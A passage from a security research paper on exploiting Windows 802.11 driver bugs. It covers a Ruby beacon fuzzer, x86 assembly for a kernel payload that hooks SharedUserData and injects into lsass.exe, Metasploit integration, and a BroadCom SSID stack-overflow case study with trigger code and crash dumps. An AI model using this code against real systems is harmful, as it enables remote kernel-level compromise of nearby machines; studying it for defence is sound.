Unassociated state. + +The following 802.11 management sub-types are processed by clients while in +state 1[3]: + + 1. Probe Request + 2. Probe Reponse + 3. Beacon + 4. Authentication + +The Probe Response and Beacon sub-types are used by wireless devices to +discover and advertise the local wireless networks. Clients can transmit Probe +Responses to discover networks as well (more below). The Authentication +sub-type is used to join a specific wireless network and reach the second +state. + +Wireless clients discover the list of available networks in two different +ways. In Active Mode, the client will send a Probe Request containing an +empty SSID field. Any access point in range will reply with a Probe Response +containing the parameters of the wireless network it serves. Alternatively, +the client can specify the SSID it is looking for. In Passive Mode, clients +will listen for Beacon requests and read the network parameters from within +the beacon. Since both of these methods result in a frame that contains +wireless network information, it makes sense for the frame format to be +similar. The method chosen by the client is determined by the capabilities of +the device and the application using the driver. + +A beacon frame includes a generic 802.11 header that defines the packet type, +source, destination, Basic Service Set ID (BSSID) and other envelope +information. Beacons also include a fixed-length header that is composed of a +timestamp, beacon interval, and a capabilities field. The fixed-length header +is followed by one or more Information Elements (IEs) which are +variable-length fields and contain the bulk of the access point information. +A probe response frame is almost identical to a beacon frame except that the +destination address is set to that of the client whereas beacons set it to the +broadcast address. + +Information elements consist of an 8-bit type field, an 8-bit length field, +and up to 255 bytes of data. This type of structure is very similar to the +common Type-Length-Value (TLV) form used in many different protocols. Beacon +and probe response packets must contain an SSID IE, a Supported Rates IE, and +a Channel IE for most wireless clients to process the packet. + +The 802.11 specification states that the SSID field (the human name for a +given wireless network) should be no more than 32 bytes long. However, the +maximum length of an information element is 255 bytes long. This leaves quite +a bit of room for error in a poorly-written wireless driver. Wireless drivers +support a large number of different information element types. The standard +even includes support for proprietary, vendor-specific IEs. + +3.2) Packet Injection + +In order to attack a driver's beacon and probe response processing code, a +method of sending raw 802.11 frames to the device is needed. Although the +ability to send raw 802.11 packets is not a supported feature in most wireless +cards, many open-source drivers can be convinced to integrate support with a +small patch. A few even support it natively. Under the Linux operating +system, there is a wide range of hardware and drivers that support raw packet +injection. Unfortunately, each driver provides a slightly different interface +for accessing this feature. To support many different wireless cards, a +hardware-independent method for sending raw 802.11 frames is needed. + +The solution is the LORCON library (Loss of Radio Connectivity), written by +Mike Kershaw and Joshua Wright. This library provides a standardized interface +for sending raw 802.11 packets through a variety of supported drivers. +However, this library is written in C and does not expose any Ruby bindings by +default. To make it possible to interact with this library from Ruby, a new +Ruby extension (ruby-lorcon) was created that interfaces with the LORCON +library and exposes a simple object-oriented interface. This wrapper interface +makes it possible to send arbitrary wireless packets from a Ruby script. + +The easiest way to call the ruby-lorcon interface from a Metasploit module is +through a mixin. Mixins are used in the 3.0 version of the Metasploit +Framework to improve code reuse and allow any module to import a rich feature +set simply by including the right mixins. The mixin that exists for LORCON +provides three new user options and a simple API for opening the interface, +sending packets, and changing the channel. + ++-----------+----------+----------+--------------------------------------------+ +| Name | Default | Required | Description | ++-----------+----------+----------+--------------------------------------------+ +| CHANNEL | 11 | yes | The default channel number | +| DRIVER | madwifi | yes | The name of the wireless driver for lorcon | +| INTERFACE | ath0 | yes | The name of the wireless interface | ++-----------+----------+----------+--------------------------------------------+ + +A Metasploit module that wants to send raw 802.11 packets should include the +Msf::Exploit::Lorcon mixin. When this mixin is used, a module can make use +of wifi.open() to open the interface and wifi.write() to send packets. The user +will specify the INTERFACE and DRIVER options for their particular hardware +and driver. The creation of the 802.11 packet itself is left in the hands of +the module developer. + +3.3) Vulnerability Discovery + +One of the fastest ways to find new flaws is through the use of a fuzzer. In +general terms, a fuzzer is a program that forces an application to process +highly variant data that is typically malformed in the hopes that one of the +attempts will yield a crash. Fuzzing a wireless device driver depends on the +device being in a state where specific frames are processed and a tool that +can send frames likely to cause a crash. In the first part of this chapter, +the authors described the default state of a wireless client and what types of +management frames are processed in this state. + +The two types of frames that this paper will focus on are Beacons and Probe +Responses. These frames have the following structure: + + +------+----------------------+ + | Size | Description | + +------+----------------------+ + | 1 | Frame Type | + | 1 | Frame Flags | + | 2 | Duration | + | 6 | Destination | + | 6 | Source | + | 6 | BSSID | + | 2 | Sequence | + | 8 | Timestamp | + | 2 | Beacon Interval | + | 2 | Capability Flags | + | Var | Information Elements | + | 2 | Frame Checksum | + +------+----------------------+ + +The Information Elements field is a list of variable-length structures +consisting of a one byte type field, a one byte length field, and up to 255 +bytes of data. Variable-length fields are usually good targets for fuzzing +since they require special processing when the packet is parsed. To attack a +driver that uses Passive Mode to discover wireless networks, it's necessary to +flood the target with mangled Beacons. To attack a driver that uses Active +Mode, it's necessary to flood the target with mangled Probe Responses while +forcing it to scan for networks. The following Ruby code generates a Beacon +frame with randomized Information Element data. The Frame Checksum field is +automatically added by the driver and does not need to be included. + +# +# Generate a beacon frame with random information elements +# + +# Maximum frame size (max is really 2312) +mtu = 1500 + +# Number of information elements +ies = rand(1024) + +# Randomized SSID +ssid = Rex::Text.rand_text_alpha(rand(31)+1) + +# Randomized BSSID +bssid = Rex::Text.rand_text(6) + +# Randomized source +src = Rex::Text.rand_text(6) + +# Randomized sequence +seq = [rand(255)].pack('n') + +# Capabiltiies +cap = Rex::Text.rand_text(2) + +# Timestamp +tstamp = Rex::Text.rand_text(8) + +frame = + "\x80" + # type/subtype (mgmt/beacon) + "\x00" + # flags + "\x00\x00" + # duration + "\xff\xff\xff\xff\xff\xff" + # dst (broadcast) + src + # src + bssid + # bssid + seq + # seq + tstamp + # timestamp value + "\x64\x00" + # beacon interval + cap # capabilities + + # First IE: SSID + "\x00" + ssid.length.chr + ssid + + + # Second IE: Supported Rates + "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + + + # Third IE: Current Channel + "\x03" + "\x01" + channel.chr + +# Generate random Information Elements and append them +1.upto(ies) do |i| + max = mtu - frame.length + break if max < 2 + t = rand(256) + l = (max - 2 == 0) ? 0 : (max > 255) ? rand(255) : rand(max - 1) + d = Rex::Text.rand_text(l) + frame += t.chr + l.chr + d +end + +While this is just one example of a simple 802.11 fuzzer for a particular +frame, much more complicated, state-aware fuzzers could be implemented that +make it possible to fuzz other packet handling areas of wireless device +drivers. + +4) Exploitation + +After an issue has been identified through the use of a fuzzer or through +manual analysis, it's necessary to begin the process of determining a way to +reliably gain control of the instruction pointer. In the case of stack-based +buffer overflows on Windows, this process is often as simple as determining +the offset to the return address and then overwriting it with an address of an +instruction that jumps back into the stack. That's the best case scenario, +though, and there are often other hurdles that one may have to overcome +regardless of whether or not the vulnerability exists in a device driver or in +a user-mode program. These hurdles and other factors are what tend to make +the process of getting reliable control of the instruction pointer one of the +most challenging steps in exploit development. Rather than exhaustively +describing all of the problems one could run into, the authors will instead +provide illustrations in the form of real world examples included in chapter 5. + +Assuming reliable control of the instruction pointer can be gained, the +development of an exploit typically transitions into its final stage: +arbitrary code execution. In user-mode, this stage has been completely +automated for most exploit developers. It's become common practice to simply +use Metasploit's user-mode payload generator. Kernel-mode payloads, on the +other hand, have not seen an integrated solution for producing reliable +payloads that can be dropped into any exploit. That's certainly not to say +that there hasn't been previous work dealing with kernel-mode payloads, as +there definitely has been[2,1], but their form up to now has been one that is not +particularly easy to adopt. This lack of easy to use kernel-mode payloads can +be seen as one of the major reasons why there has not been a large number of +public, reliable kernel-mode exploits. + +Since one of the goals of this paper is to illustrate how kernel-mode exploits +can be written just as easily as user-mode exploits, the authors determined +that it was necessary to incorporate the existing set of kernel-mode payload +ideas into the 3.0 version of the Metasploit framework where they could be +used freely with any future kernel-mode exploits. While this final +integration was certainly the end-goal, there were a number of important steps +that had to be taken before the integration could occur. The following +sections will attempt to provide this background. In section 4.1, details +regarding the payload architecture that the authors selected is described in +detail. This section also includes a description of the interface that has +been exposed in the 3.0 version of the Metasploit Framework for developers who +wish to implement kernel-mode exploits. + +4.1) Payload Architecture + +The payload architecture that the authors decided to integrate was based +heavily off previous research[1]. As was alluded to in the introduction, there +are a number of complicated considerations that must be taken into account +when dealing with kernel-mode exploitation. A large majority of these +considerations are directly related to what methods should be used when +executing arbitrary code in the kernel. For example, if a device driver was +holding a lock at the time that an exploit was triggered, what might be the +best way to go about releasing that lock so as to recover the system so that +it will still be possible to interact with it in a meaningful way? Other +types of considerations include things like IRQL restrictions, cleaning up +corrupted structures, and so on. These considerations lead to there being +many different ways in which a payload might best be implemented for a +particular vulnerability. This is quite a bit different from the user-mode +environment where it's almost always possible to use the exact same payload +regardless of the application. + +Though these situational complications do exist, it is possible to design and +implement a payload system that can be applied in almost any circumstance. By +separating kernel-mode payloads into variable components, it becomes possible +to combine components together in different ways to form functional variations +that are best suited for particular situations. In Windows Kernel-mode +Payload Fundamentals [1], kernel-mode payloads are broken down into four +different components: migration, stagers, recovery, and stages. + +When describing kernel-mode payloads in terms of components, the migration +component would be one that is used to migrate from an unsafe execution +environment to a safe execution environment. For example, if the IRQL is at +DISPATCH when a vulnerability is triggered, it may be necessary to migrate to +a safer IRQL such as PASSIVE. It is not always necessary to have a migration +component. The purpose of a stager component is to move some portion of the +payload so that it executes in the context of another thread context. This +may be necessary if the current thread is of critical importance or may lead +to a deadlock of the system should certain operations be used. The use of a +stager may obviate the need for a migration component. A recovery component +is something that is used to restore the system to clean state and then +continue execution. This component is generally one that may require +customization for a given vulnerability as it may not always be possible to +describe the steps needed to recover the system in a generic way. For +example, if locks were held at the time that the vulnerability was triggered, +it may be necessary to find a way to release those locks and then continue +execution from a safe point. Finally, the stage component is a catch-all for +whatever arbitrary code may be executed once the payload is running in a safe +environment. + +This model for describing kernel-mode payloads is what the authors decided to +adopt. To better understand how this model works, it seems best to describe +how it was applied for all three real world vulnerabilities that are shown in +chapter 5. These three vulnerabilities actually make use of the same basic +underlying payload, which will henceforth be referred to as ``the payload'' +for brevity. The payload itself is composed of three of the four components. +Each of the payload components will be discussed individually and then as a +whole to provide an idea for how the payload operates. + +The first component that exists in the payload is a stager component. The +stager that the authors chose to use is based on the SharedUserData SystemCall +Hook stager described in [1]. Before understanding how the stager works, it's +important to understand a few things. As the name implies, the stager +accomplishes its goal by hooking the SystemCall attribute found within +SharedUserData. As a point of reference, SharedUserData is a global page that +is shared between user-mode and kernel-mode. It acts as a sort of global +structure that contains things like tick count and time information, version +information, and quite a few other things. It's extremely useful for a few +different reasons, not the least of which being that it's located at a fixed +address in user-mode and in kernel-mode on all NT derivatives. This means +that the stager is instantly portable and doesn't need to perform any symbol +resolution to locate the address, thus helping to keep the overall size of the +payload small. + +The SystemCall attribute that is hooked is part of an enhancement that was +added in Windows XP. This enhancement was designed to make it possible to use +optimized system call instructions depending on what hardware support is +present on a given machine. Prior to Windows XP, system calls were dispatched +from user-mode through the hardcoded use of the int 0x2e soft interrupt. Over +time, hardware enhancements were made to decrease the overhead involved in +performing a system call, such as through the introduction of the sysenter +instruction. Since Microsoft isn't in the business of providing different +versions of Windows for different makes and models of hardware, they decided +to determine at runtime which system call interface to use. SharedUserData +was the perfect candidate for storing the results of this runtime +determination as it was already a shared page that existed in every user-mode +process. After making these modifications, ntdll.dll was updated to dispatch +system calls through SharedUserData rather than through the hardcoded use of +int 0x2e. The initial implementation of this new system call dispatching +interface placed executable code within the SystemCall attribute of +SharedUserData. Subsequent versions of Windows, such as XP SP2, turned the +SystemCall attribute into a function pointer. + +One important implication about the introduction of the SystemCall attribute +to SharedUserData is that it represents a pivot point through which all system +call dispatching occurs in user-mode. In previous versions of Windows, each +user-mode system call stub routine invoked int 0x2e directly. In the latest +versions, these stub routines make indirect calls through the SystemCall +function pointer. By default, this function pointer is initialized to point +to one of a few exported symbols within ntdll.dll. However, the implications +of this function pointer being changed to point elsewhere mean that it would +be possible to intercept all system calls within all processes. This +implication is what forms the very foundation for the stager that is used by +the payload. + +When the stager begins executing, it's running in kernel-mode in the context +of the thread that triggered the vulnerability. The first action it takes is +to copy a chunk of code (the stage) into an unused portion of SharedUserData +using the predictable address of 0xffdf037c. After the copy operation +completes, the stager proceeds by hooking the SystemCall attribute. This hook +must be handled differently depending on whether or not the target operating +system is pre-XP SP2 or not. More details on how this can be handled are +described in [1]. Regardless of the approach, the SystemCall attribute is +redirected to point to 0x7ffe037c. This predictable location is the user-mode +accessible address of the unused portion of SharedUserData where the stage was +copied into. After the hooking operation completes, all system calls invoked +by user-mode processes will first go through the stage placed at 0x7ffe037c. +The stager portion of the payload looks something like this (note, this +implementation is only designed to work on XP SP2 and Windows 2003 Server SP1. +Modifications would need to be made to make it work on previous versions of XP +and 2003): + +; Jump/Call to get the address of the stage +00000000 EB38 jmp short 0x3a +00000002 BB0103DFFF mov ebx,0xffdf0301 +00000007 4B dec ebx +00000008 FC cld +; Copy the stage into 0xffdf037c +00000009 8D7B7C lea edi,[ebx+0x7c] +0000000C 5E pop esi +0000000D 6AXX push byte num_stage_dwords +0000000F 59 pop ecx +00000010 F3A5 rep movsd +; Set edi to the address of the soon-to-be function pointer +00000012 BF7C03FE7F mov edi,0x7ffe037c +; Check to make sure the hook hasn't already been installed +00000017 393B cmp [ebx],edi +00000019 7409 jz 0x24 +; Grab SystemCall function pointer +0000001B 8B03 mov eax,[ebx] +0000001D 8D4B08 lea ecx,[ebx+0x8] +; Store the existing value in 0x7ffe0308 +00000020 8901 mov [ecx],eax +; Overwrite the existing function pointer and make things live! +00000022 893B mov [ebx],edi + +; recovery stub here + +0000003A E8C3FFFFFF call 0x2 + +; stage here + +With the hook in place, the stager has completed its primary task which was to +copy a stage into a location where it could be executed in the future. Before +the stage can execute, the stager must allow the recovery component of the +payload to execute. As mentioned previously, the recovery component +represents one of the most vulnerability-specific portions of any kernel-mode +payload. For the purpose of the exploits described in chapter 5, a special +purpose recovery component was necessary. + +This particular recovery component was required due to the fact that the +example vulnerabilities are triggered in the context of the Idle thread. On +Windows, the Idle thread is a special kernel thread that executes whenever a +processor is idle. Due to the nature of the way the Idle thread operates, +it's dangerous to perform operations like spinning the thread or any of the +other recovery methods described in [1]. It may also be possible to apply the +technique for delaying execution within the Idle thread as discussed in [2]. The +recovery method that was finally selected involves two basic steps. First, +the IRQL for the current processor is restored to DISPATCH level just in case +it was executing at a higher IRQL. Second, execution control is transferred +into the first instruction of nt!KiIdleLoop after initializing registers +appropriately. The end effect is that the idle thread begins executing all +over again and, if all goes well, the system continues operating as if nothing +had happened. In practice, this recovery method has been proven reliable. +However, the one negative that it is has is that it requires knowledge of the +address that nt!KiIdleLoop resides at. This dependence represents an area +that is ripe for future improvement. Regardless of limitations, the recovery +component for the payload looks like the code below: + +; Restore the IRQL +00000024 31C0 xor eax,eax +00000026 64C6402402 mov byte [fs:eax+0x24],0x2 +; Initialize assumed registers +0000002B 8B1D1CF0DFFF mov ebx,[0xffdff01c] +00000031 B827BB4D80 mov eax,0x804dbb27 +00000036 6A00 push byte +0x0 +; Transfer control to nt!KiIdleLoop +00000038 FFE0 jmp eax + +After the recovery component has completed its execution, all of the payload +code that was originally executing in kernel-mode is complete. The final +portion of the payload that remains to be executed is the stage that was +copied by the stager. The stage itself runs in user-mode within all process +contexts, and it executes every time a system call is dispatched. The +implications of this should be obvious. Having a stage that executes within +every process every time a system call occurs is just asking for trouble. For +that reason, it makes sense to design a generic user-mode stage that can be +used to limit the times that it executes to one particular context. + +The approach that the authors took to meet this requirement is as follows. +First, the stage performs a check that is designed to see if it is running in +the context of a specific process. This check is there in order to help +ensure that the stage itself only executes in a known-good environment. As an +example, it would be a shame to take advantage of a kernel-mode vulnerability +only to finally execute code with the privileges of Guest. By default, this +check is designed to see if the stage is running within lsass.exe, a process +that runs with SYSTEM level privileges. If the stage is running within lsass, +it performs a check to see if the SpareBool attribute of the Process +Environment Block has been set to one. By default, this value is initialized +to zero in all processes. If the SpareBool attribute is set to zero, then the +stage proceeds to set the SpareBool attribute to one and then finishes by +executing whatever code is remaining within the stage. If the SpareBool +attribute is set to one, which means the stage has already run, or it's not +running within lsass, it transfers control back to the original system call +dispatching routine. This is necessary because it is still a requirement that +system calls from user-mode processes be dispatched appropriately, otherwise +the system itself would grind to a halt. An example of what this stage might +look like is shown below: + +; Preserve the calling environment +0000003F 60 pusha +00000040 6A30 push byte +0x30 +00000042 58 pop eax +00000043 99 cdq +00000044 648B18 mov ebx,[fs:eax] +; Check if Peb->Ldr is NULL +00000047 39530C cmp [ebx+0xc],edx +0000004A 7426 jz 0x72 +; Extract Peb->ProcessParameters->ImagePathName.Buffer +0000004C 8B5B10 mov ebx,[ebx+0x10] +0000004F 8B5B3C mov ebx,[ebx+0x3c] +; Add 0x28 to the image path name (skip past c:\windows\system32\) +00000052 83C328 add ebx,byte +0x28 +; Compare the name of the executable with lass +00000055 8B0B mov ecx,[ebx] +00000057 034B03 add ecx,[ebx+0x3] +0000005A 81F96C617373 cmp ecx,0x7373616c +; If it doesn't match, execute the original system call dispatcher +00000060 7510 jnz 0x72 +00000062 648B18 mov ebx,[fs:eax] +00000065 43 inc ebx +00000066 43 inc ebx +00000067 43 inc ebx +; Check if Peb->SpareBool is 1, if it is, execute the original +; system call dispatcher +00000068 803B01 cmp byte [ebx],0x1 +0000006B 7405 jz 0x72 +; Set Peb->SpareBool to 1 +0000006D C60301 mov byte [ebx],0x1 +; Jump into the continuation stage +00000070 EB07 jmp short 0x79 +; Restore the calling environment and execute the original system call +; dispatcher that was preserved in 0x7ffe0308 +00000072 61 popa +00000073 FF250803FE7F jmp near [0x7ffe0308] + +; continuation of the stage + +The culmination of these three payload components is a functional payload that +can be used in any situation where an exploit is triggered within the Idle +thread. If the exploit is triggered outside of the context of the Idle +thread, the recovery component can be swapped out with an alternative method +and the rest of the payload can remain unchanged. This is one of the benefits +of breaking kernel-mode payloads down into different components. To recap, +the payload works by using a stager to copy a stage into an unused portion of +SharedUserData. The stager then points the SystemCall attribute to that +unused portion, effectively causing all user-mode processes to bounce through +the stage when they attempt to make a system call. Once the stager has +completed, the recovery component restores the IRQL to DISPATCH and then +restarts the Idle thread. The kernel-mode portion of the payload is then +complete. Shortly after that, the stage that was copied to SharedUserData is +executed in the context of a specific user-mode process, such as lsass.exe. +Once this occurs, the stage sets a flag that indicates that it's been executed +and completes. All told, the payload itself is only 115 bytes, excluding any +additional code in the stage. + +Given all of this infrastructure work, it's trivial to plug almost any +user-mode payload into the stage. The additional code must simply be placed +at the point where it's verified that it's running in a particular process and +that it hasn't been executed before. The reason for it being so trivial was +quite intentional. One of the major goals in implementing this payload system +was to make it possible to use the existing set of payloads that exist in the +Metasploit framework in conjunction with any kernel-mode exploit. This +includes even some of the more powerful payloads such as Meterpreter and VNC +injection. + +There were two key elements involved in integrating kernel-mode payloads into +the 3.0 version of the Metasploit Framework. The first had to do with +defining the interface that exploit developers would need to use when writing +kernel-mode exploits. The second delt with defining the interface the +end-users would have to be aware of when using kernel-mode exploits. In terms +of precedence, defining the programming level interfaces first is the ideal +approach. To that point, the programming interface that was decided upon is +one that should be pretty easy to use. The majority of the complexity +involved in selecting a kernel-mode payload is hidden from the developer. +There are only a few basic things that the developer needs to be aware of. + +When implementing a kernel-mode exploit in Metasploit 3.0, it is necessary to +include the Msf::Exploit::KernelMode mixin. This mixin provides hints to the +framework that make it aware of the fact that any payloads used with this +exploit will need to be appropriately encapsulated within a kernel-mode +stager. With this simple action, the majority of the work associated with the +kernel-mode payload is abstracted away from the developer. The only other +elements that a developer may need to deal with is the process of defining +extended parameters that are used to further control the process of selecting +different aspects of the kernel-mode payload. These controlable parameters +are exposed to developers through the ExtendedOptions hash element in an +exploit's global or target-specific Payload options. An example of what this +might look like within an exploit can be seen here: + +'Payload' => +{ + 'ExtendedOptions' => + { + 'Stager' => 'sud_syscall_hook', + 'Recovery' => 'idlethread_restart', + 'KiIdleLoopAddress' => 0x804dbb27, + } +} + +In the above example, the exploit has explicitly selected the underlying +stager component that should be used by specifying the Stager hash element. +The sudsyscallhook stager is a symbolic name for the stager that was described +in section 4.1. The example above also has the exploit explicitly selecting the +recovery component that should be used. In this case, the recovery component +that is selected is idlethreadrestart which is a symbolic name for the +recovery component described previously. Additionally, the nt!KiIdleLoop +address is specified for use with this particular recovery component. Under +the hood, the use of the KernelMode mixin and the additional extended options +results in the framework encapsulating whatever user-mode payload the end-user +specified inside of a kernel-mode stager. In the end, this process is +entirely transparent to both the developer and the end-user. + +While the set of options that can be specified in the extended options hash +will surely grow in the future, it makes sense to at least document the set of +defined elements at the time of this writing. These options include: + + +Recovery: Defines the recovery component that should be used when generating +the kernel-mode payload. The current set of valid values for this option +include spin, which will spin the current thread, idlethreadrestart, which +will restart the Idle thread, or default which is equivalent to spin. Over +time, more recovery methods may be added. These can be found in recovery.rb. + +RecoveryStub: Defines a custom recovery component. + +Stager: Defines the stager component that should be used when generating the +kernel-mode payload. The current set of valid values for this option include +sudsyscallhook. Over time, more stager methods may be added. These can be +found in stager.rb. + +UserModeStub: Defines the user-mode custom code that should be executed as +part of the stage. + +RunInWin32Process: Currently only applicable to the sudsyscallhook stager. +This element specifies the name of the system process, such as lsass.exe, that +should be injected into. + +KiIdleLoopAddress: Currently only applicable to the idlethreadrestart recovery +component. This element specifies the address of nt!KiIdleLoop. + +While not particularly important to developers or end-users, it may be +interesting for some to understand how this abstraction works internally. To +start things off, the KernelMode mixin overrides a base class method called +encodebegin. This method is called when a payload that is used by an exploit +is being encoded. When this happens, the mixin declares a procedure that is +called by the payload encoder. In turn, this procedure is called by the +payload encoder in the context of encapsulating the pre-encoded payload. The +procedure itself is passed the original raw user-mode payload and the payload +options hash (which contains the extended options, if any, that were specified +in the exploit). It uses this information to construct the kernel-mode stager +that is used to encapsulate the user-mode payload. If the procedure completes +successfully, it returns a non-nil buffer that contains the original user-mode +payload encapsulated within a kernel-mode stager. The kernel-mode stager and +other components are actually contained within the payloads subsystem of the +Rex library under lib/rex/payloads/win32/kernel. + +5) Case Studies + +This chapter describes three separate vulnerabilities that were found by the +authors in real world 802.11 wireless device drivers. These three issues were +found through a combination of fuzzing and manual analysis. + +5.1) BroadCom + +The first vulnerability that was subject to the process described in this +paper was an issue that was found in BroadCom's wireless device driver. This +vulnerability was discovered by Chris Eagle as a result of his interest in +doing some reversing of kernel-mode code. Chris noticed what appeared to be a +conventional stack overflow in the way the BroadCom device driver handled +beacon packets. As a result of this tip, a simple program was written that +generated beacon packets with overly sized SSIDs. The code that was used to +do this is shown below: + +int main(int argc, char **argv) +{ + Packet_80211 BeaconPacket; + + CreatePacketForExploit(BeaconPacket, basic_target); + + printf("Looping forever, sending packets.\n"); + + while(true) + { + int ret = Send80211Packet(&in_tx, BeaconPacket); + usleep(cfg.usleep); + if (ret == -1) + { + printf("Error tx'ing packet. Is interface up?\n"); + exit(0); + } + } +} + +void CreatePacketForExploit(Packet_80211 &P, struct target T) +{ + Packet_80211_mgmt Beacon; + u_int8_t bcast_addy[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; + Packet_80211_mgmt_Crafter MgmtCrafter(bcast_addy, cfg.src, cfg.bssid); + MgmtCrafter.craft(8, Beacon); // 8 = beacon + P = Beacon; + printf("\n"); + + if (T.payload_size > 255) + { + printf("invalid target. payload sizes > 255 wont fit in a single IE\n"); + exit(0); + } + + u_int8_t fixed_parameters[12] = { + '_', ',', '.', 'j', 'c', '.', ',', '_', // timestamp (8 bytes) + 0x64, 0x00, // beeacon interval, 1.1024 secs + 0x11, 0x04 // capability information. ESS, WEP, Short slot time + }; + + P.AppendData(sizeof(fixed_parameters), fixed_parameters); + + u_int8_t SSID_ie[257]; //255 + 2 for type, value + u_int8_t *SSID = SSID_ie + 2; + + SSID_ie[0] = 0; + SSID_ie[1] = 255; + + memset(SSID, 0x41, 255); + + //Okay, SSID IE is ready for appending. + P.AppendData(sizeof(SSID_ie), SSID_ie); + P.print_hex_dump(); +} + +As a result of running this code, 802.11 beacon packets were produced that did +indeed contain overly sized SSIDs. However, these packets appeared to have no +effect on the BroadCom device driver. After considerable head scratching, a +modification was made to the program to see if a normally sized SSID would +cause the device driver to process it. If it were processed, it would mean +that the fake SSID would show up in the list of available networks. Even +after making this modification, the device driver still did not appear to be +processing the manually crafted 802.11 beacon packets. Finally, it was +realized that the driver might have some checks in place such that it would +only process beacon packets from networks that also respond to 802.11 probes. +To test this theory out, the code was changed in the manner shown below: + +CreatePacketForExploit(BeaconPacket, basic_target); + +//CreatePacket returns a beacon, we will also send out directd probe responses. +Packet_80211 ProbePacket = BeaconPacket; + +ProbePacket.wlan_header->subtype = 5; //probe response. +ProbePacket.setDstAddr(cfg.dst); + +... + +while(true) +{ + int ret = Send80211Packet(&in_tx, BeaconPacket); + usleep(cfg.usleep); + ret = Send80211Packet(&in_tx, ProbePacket); + usleep(2*cfg.usleep); +} + +Sending out directed probe responses as well as beacon packets caused results +to be generated immediately. When a small SSID was sent, it would suddenly +show up in the list of available wireless networks. When an overly sized SSID +was sent, it resulted in a much desired bluescreen as a result of the stack +overflow that Chris had identified. The following output shows some of the +crash information associated with transmitting an SSID that consisted of 255 +0xCC's: + +DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) +An attempt was made to access a pageable (or completely invalid) address at an +interrupt request level (IRQL) that is too high. This is usually +caused by drivers using improper addresses. +If kernel debugger is available get stack backtrace. +Arguments: +Arg1: ccccfe9d, memory referenced +Arg2: 00000002, IRQL +Arg3: 00000000, value 0 = read operation, 1 = write operation +Arg4: f6e713de, address which referenced memory +... +TRAP_FRAME: 80550004 -- (.trap ffffffff80550004) +ErrCode = 00000000 +eax=cccccccc ebx=84ce62ac ecx=00000000 edx=84ce62ac esi=805500e0 edi=84ce6308 +eip=f6e713de esp=80550078 ebp=805500e0 iopl=0 nv up ei pl zr na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 +bcmwl5+0xf3de: +f6e713de f680d131000002 test byte ptr [eax+31D1h],2 ds:0023:ccccfe9d=?? +... +kd> k v + *** Stack trace for last set context - .thread/.cxr resets it +ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. +805500e0 cccccccc cccccccc cccccccc cccccccc bcmwl5+0xf3de +80550194 f76a9f09 850890fc 80558e80 80558c20 0xcccccccc +805501ac 804dbbd4 850890b4 850890a0 00000000 NDIS!ndisMDpcX+0x21 (FPO: [Non-Fpo]) +805501d0 804dbb4d 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 (FPO: [0,0,0]) +805501d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 (FPO: [0,0,0]) + +In this case, the crash occurred because a variable on the stack was +overwritten that was subsequently used as a pointer. This overwritten +pointer was then dereferenced. In this case, the dereference occurred through +the eax register. Although the crash occurred as a result of the dereference, +it's important to note that the return address for the stack frame was +successfully overwritten with a controlled value of 0xcccccccc. If the +function had been allowed to return cleanly without trying to dereference +corrupted pointers, full control of the instruction pointer would have been +obtained. + +In order to avoid this crash and gain full control of the instruction pointer, +it's necessary to try to calculate the offset to the return address from the start +of the buffer that is being transmitted. Figuring out this offset also has +the benefit of making it possible to figure out the minimum number of bytes +necessary to transmit to trigger the overflow. This is important because it +may be useful when it comes to preventing the dereference crash that was seen +previously. + +There are many different ways in which the offset of the return address can be +determined. In this situation, the simplest way to go about it is to transmit +a buffer that contains an incrementing array of bytes. For instance, byte +index 0 is 0x00, byte index 1 is 0x01, and so on. The value that the return +address is overwritten with will then make it possible to calculate its offset +within the buffer. After transmitting a packet that makes use of this +technique, the following crash is rendered: + +DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) +An attempt was made to access a pageable (or completely invalid) address at an +interrupt request level (IRQL) that is too high. This is usually +caused by drivers using improper addresses. +If kernel debugger is available get stack backtrace. +Arguments: +Arg1: 605f902e, memory referenced +Arg2: 00000002, IRQL +Arg3: 00000000, value 0 = read operation, 1 = write operation +Arg4: f73673de, address which referenced memory +... +STACK_TEXT: +80550004 f73673de badb0d00 84d8b250 80550084 nt!KiTrap0E+0x233 +WARNING: Stack unwind information not available. Following frames may be wrong. +805500e0 5c5b5a59 605f5e5d 64636261 68676665 bcmwl5+0xf3de +80550194 f76a9f09 84e9e0fc 80558e80 80558c20 0x5c5b5a59 +805501ac 804dbbd4 84e9e0b4 84e9e0a0 00000000 NDIS!ndisMDpcX+0x21 +805501d0 804dbb4d 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 +805501d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 + +From this stack trace, it can be seen that the return address was overwritten +with 0x5c5b5a59. Since byte-ordering on x86 is little endian, the offset +within the buffer that contains the SSID is 0x59. + +With knowledge of the offset at which the return address is overwritten, the +next step becomes figuring out where in the buffer to place the arbitrary code +that will be executed. Before going down this route, it's important to +provide a little bit of background on the format of 802.11 Management packets. +Management packets encode all of their information in what the standard calls +Information Elements (IEs). IEs have a one byte identifier followed by a one +byte length which is subsequently followed by the associated IE data. For +those familiar with Type-Length-Value (TLV), IEs are roughly the same thing. +Based on this definition, the largest possible IE is 257 bytes (2 bytes of +overhead, and 255 bytes of data). + +The upshot of the size restrictions associated with an IE means that the +largest possible SSID that can be copied to the stack is 255 bytes. When +attempting to find the offset of the return address on the stack, an SSID IE +was sent with a 255 byte SSID. Considering the fact that a stack overflow +occurred, one might reasonably expect to find the entire 255 byte SSID on the +stack as a result of the overflow that occurred. A quick dump of the stack +can be used to validate this assumption: + +kd> db esp L 256 +80550078 2e f0 d9 84 0c 80 d8 84-00 80 d8 84 00 07 0e 01 ................ +80550088 02 03 ff 00 01 02 03 04-05 06 07 08 09 0a 0b 0c ................ +80550098 0d 0e 0f 10 11 12 13 14-15 16 17 18 19 1a 1b 1c ................ +805500a8 1d 1e 1f 20 21 22 23 24-25 26 0b 28 0c 00 00 00 ... !"#$%&.(.... +805500b8 82 84 8b 96 24 30 48 6c-0c 12 18 60 44 00 55 80 ....$0Hl...`D.U. +805500c8 3d 3e 3f 40 41 42 43 44-45 46 01 02 01 02 4b 4c =>?@ABCDEF....KL +805500d8 